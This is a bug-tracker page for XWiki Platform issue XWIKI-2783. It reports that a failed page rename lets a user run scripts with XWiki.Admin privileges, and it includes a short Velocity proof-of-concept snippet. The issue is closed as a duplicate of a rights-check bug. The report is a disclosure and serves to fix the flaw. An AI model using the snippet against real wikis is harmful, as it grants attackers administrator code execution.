Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-2783

Privil3g3 escalation while renaming a page for Girliz

    XMLWordPrintable

Details

    • Bug
    • Resolution: Duplicate
    • Major
    • None
    • None
    • {Unused} Core
    • None

    Description

      While renaming a page, even if it fails, $doc points to the page the user gave in $doc.rename().
      This permits to execute scripts with other privileges than the user's one.

      For eg, if a user as write acces to his userpage (by default), it can execute code as XWiki.Admin by inserting this in his user page:

      #set($renamedBLs = $util.arrayList)
$doc.rename("XWiki.Admin", $renamedBLs)
## After this line, the code is executed as if it was in the page XWiki.Admin
## If XWiki.Admin was save by XWiki.Admin and XWiki.Admin has programming rights, this should work:
<%= "Deny Everything" %>

      Attachments

        Issue Links

          duplicates

          Bug - A problem which impairs or prevents the functions of the product. XWIKI-4462 Document#rename(String newDocumentName, List<String> backlinkDocumentNames) does not check rights like #rename(String newDocumentName) does

          • Major - Major loss of function.
          • Closed

          Activity

            People

              tmortagne Thomas Mortagne
              raffaello Raffaello Pelagalli
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: